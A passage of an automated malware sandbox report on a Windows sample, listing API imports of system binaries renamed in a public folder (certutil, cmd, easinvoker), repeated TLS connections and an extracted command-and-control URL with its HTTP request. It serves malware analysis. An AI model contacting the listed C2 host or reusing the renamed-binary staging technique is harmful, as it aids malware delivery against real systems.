      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF7E081DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF7E0867EE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF7E07E7F14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF7E0825F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0821E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF7E0895E3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF7E085DE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0835FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E0835FA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF7E0895FF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C5FE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895F20 CryptDecodeObjectEx,6_2_00007FF7E0895F20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0805F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF7E0805F54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF7E07CFF64
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0839F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E0839F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C60DA
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF7E085E044
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0804070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF7E0804070
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49793 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49799 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49801 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49805 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49809 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49811 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49813 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49816 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49823 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49830 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49842 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49848 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49858 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49865 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49877 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49884 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49903 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49910 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49918 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49929 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49945 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49962 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49973 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50017 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50032 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50062 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50069 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50088 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50096 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50107 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50114 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50126 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50133 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50145 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50153 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50160 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50162 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50164 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50170 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50172 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50174 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50176 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50178 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50180 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50182 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50184 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50186 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50188 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50190 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50192 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50194 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50196 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50198 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50200 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50202 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50204 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50206 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50208 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50210 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50212 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50214 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50216 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50218 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50220 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF793741560
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF7E087234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF7E080C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF7E0876F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E08710C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E0873100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF7E081D4A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07DD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF7E0853674
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7E08719F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF7E0871B04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF7E081DBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF7E0815E58
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02DF5908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF793741560

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0E4B4 InternetCheckConnectionA,9_2_02E0E4B4
      Source: Joe Sandbox ViewIP Address: 108.170.55.202 108.170.55.202
      Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
